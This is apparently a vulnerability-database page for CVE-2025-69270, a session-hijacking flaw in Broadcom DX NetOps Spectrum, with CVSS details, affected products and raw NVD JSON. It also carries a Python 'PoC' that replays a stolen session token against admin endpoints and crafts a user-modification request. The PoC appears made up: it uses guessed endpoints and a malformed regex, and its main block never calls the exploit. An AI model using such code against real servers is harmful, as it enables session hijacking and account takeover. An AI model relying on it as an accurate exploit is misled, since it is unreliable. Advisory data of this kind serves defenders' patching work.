Security Vulnerability Report
中文
CVE-2025-69270 CVSS 9.8 CRITICAL

CVE-2025-69270

Published: 2026-01-12 05:16:11
Last Modified: 2026-01-14 17:56:05

Description

Information Exposure Through Query Strings in GET Request vulnerability in Broadcom DX NetOps Spectrum on Windows, Linux allows Session Hijacking.This issue affects DX NetOps Spectrum: 24.3.8 and earlier.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:broadcom:dx_netops_spectrum:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:* - NOT VULNERABLE
Broadcom DX NetOps Spectrum <= 24.3.8 (Windows)
Broadcom DX NetOps Spectrum <= 24.3.8 (Linux)
Broadcom DX NetOps Spectrum 24.3.8及更早所有版本

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-69270 PoC - Session Hijacking via Query String Exposure # Affected: Broadcom DX NetOps Spectrum <= 24.3.8 import requests import re from urllib.parse import urlparse TARGET_HOST = "http://target-spectrum-server.com" def exploit_session_hijacking(): """ Simulate exploitation of CVE-2025-69270 The vulnerability allows session hijacking through exposed query strings in GET requests """ print("[*] CVE-2025-69270 - DX NetOps Spectrum Session Hijacking") # Step 1: Capture the vulnerable GET request with session in query string # Normal request that exposes session ID in URL vulnerable_endpoints = [ "/spectrum/session", "/spectrum/admin", "/spectrum/config", "/spectrum/reporting" ] # Step 2: Extract session ID from query string session_id_pattern = r'[Ss]ession[Ii][Dd]\s*[=:)\s]*([a-zA-Z0-9\-]+)' for endpoint in vulnerable_endpoints: # Example vulnerable URL with session exposed in query string vulnerable_url = f"{TARGET_HOST}{endpoint}?sessionId=STOLEN_SESSION_TOKEN&user=admin" # Step 3: Use stolen session to hijack the session headers = { 'Cookie': f'sessionId=STOLEN_SESSION_TOKEN', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)' } response = requests.get(vulnerable_url, headers=headers, verify=False) if response.status_code == 200 and 'authenticated' in response.text.lower(): print(f"[+] Session hijacking successful on {endpoint}") print(f"[!] Attacker can now perform actions as authenticated user") return True return False def generate_malicious_request(): """ Generate the malicious request using stolen session """ stolen_session = "STOLEN_SESSION_TOKEN_12345" malicious_url = f"{TARGET_HOST}/spectrum/admin/userMgmt?action=modify&sessionId={stolen_session}" return { 'method': 'GET', 'url': malicious_url, 'note': 'Session ID exposed in query string allows hijacking' } if __name__ == "__main__": print("CVE-2025-69270 PoC for DX NetOps Spectrum") print("Reference: https://nvd.nist.gov/vuln/detail/CVE-2025-69270")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-69270", "sourceIdentifier": "[email protected]", "published": "2026-01-12T05:16:10.900", "lastModified": "2026-01-14T17:56:04.990", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Information Exposure Through Query Strings in GET Request vulnerability in Broadcom DX NetOps Spectrum on Windows, Linux allows Session Hijacking.This issue affects DX NetOps Spectrum: 24.3.8 and earlier."}, {"lang": "es", "value": "Exposición de información a través de cadenas de consulta en solicitudes GET vulnerabilidad en Broadcom DX NetOps Spectrum en Windows, Linux permite el secuestro de sesión. Este problema afecta a DX NetOps Spectrum: 24.3.8 y anteriores."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:L/SC:L/SI:L/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.3, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "PRESENT", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "LOW", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-598"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:broadcom:dx_netops_spectrum:*:*:*:*:*:*:*:*", "versionEndExcluding": "24.3.9", "matchCriteriaId": "51AFD81F-F526-4FEA-98D9-C20296CADEC5"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*", "matchCriteriaId": "703AF700-7A70-47E2-BC3A-7FD03B3CA9C1"}, {"vulnerable": false, "criteria": "cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*", "matchCriteriaId": "A2572D17-1DE6-457B-99CC-64AFD54487EA"}]}]}], "references": [{"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36756", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}